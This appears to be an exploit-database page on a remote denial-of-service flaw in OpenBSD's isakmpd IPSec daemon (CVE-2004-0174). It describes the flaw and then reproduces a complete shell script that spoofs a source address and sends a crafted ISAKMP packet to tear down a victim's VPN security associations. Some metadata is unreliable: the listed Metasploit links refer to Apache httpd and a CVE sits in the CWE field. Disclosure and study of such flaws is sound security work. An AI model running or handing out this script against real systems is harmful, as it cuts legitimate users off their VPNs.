header-logo
Suggest Exploit
vendor:
OpenBSD
by:
Unknown
7.5
CVSS
HIGH
Remote Denial of Service
399
CWE
Product Name: OpenBSD
Affected Version From: OpenBSD isakmpd
Affected Version To: OpenBSD isakmpd
Patch Exists: NO
Related CWE: CVE-2004-0174
CPE: o:openbsd:openbsd
Metasploit: https://www.rapid7.com/db/vulnerabilities/http-apache-connection-blocking-dos/https://www.rapid7.com/db/vulnerabilities/apache-httpd-1_3_x-listening-socket-starvation-cve-2004-0174/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2004-0174/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2004-0174/
Other Scripts:
Platforms Tested:
Unknown

OpenBSD isakmpd Remote Denial of Service Vulnerability

An attacker can delete security associations and policies from IPSec VPN's by sending a malformed UDP ISAKMP packet to a vulnerable server. The malformed packet contains payloads for both setting up a new tunnel and deleting a tunnel. Isakmpd improperly acts upon the delete payload and terminates the associations and policies relating to the tunnel. This can result in the destruction of security associations, effectively eliminating the VPN connection between gateways and denying service to legitimate users of the VPN.

Mitigation:

Apply the appropriate patch or upgrade to a non-vulnerable version.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10496/info

It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability.

An attacker is able to delete security associations and policies from IPSec VPN's by sending a malformed UDP ISAKMP packet to a vulnerable server. The malformed packet contains payloads for both setting up a new tunnel and deleting a tunnel. Isakmpd improperly acts upon the delete payload and terminates the associations and policys relating to the tunnel.

It is possible to destroy security associations, effectively eliminating the VPN connection between gateways, denying service to legitimate users of the VPN.

#!/bin/sh

if [ ! $# -eq 3 ]; then
	echo "usage: $0 fake_src victim spi";
	exit;
fi

src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \
	$cky_i \
	"\x00\x00\x00\x00\x00\x00\x00\x00" \
	"\x08\x10\x05\x00" \
	"\x00\x00\x00\x00" \
	"\x00\x00\x00\x5c" \
	"\x01\x00\x00\x04" \
	"\x0c\x00\x00\x2c" \
	"\x00\x00\x00\x01" \
	"\x00\x00\x00\x01" \
	"\x00\x00\x00\x20" \
	"\x01\x01\x00\x01" \
	"\x00\x00\x00\x18" \
	"\x00\x01\x00\x00" \
	"\x80\x01\x00\x05" \
	"\x80\x02\x00\x02" \
	"\x80\x03\x00\x01" \
	"\x80\x04\x00\x02" \
	"\x00\x00\x00\x10" \
	"\x00\x00\x00\x01" \
	"\x03\x04\x00\x01" \
	$spi |
	dnet udp sport 500 dport 500 |
	dnet ip proto udp src $src dst $dst |
	dnet send

Navigation

Suggest Exploit

Services By CQR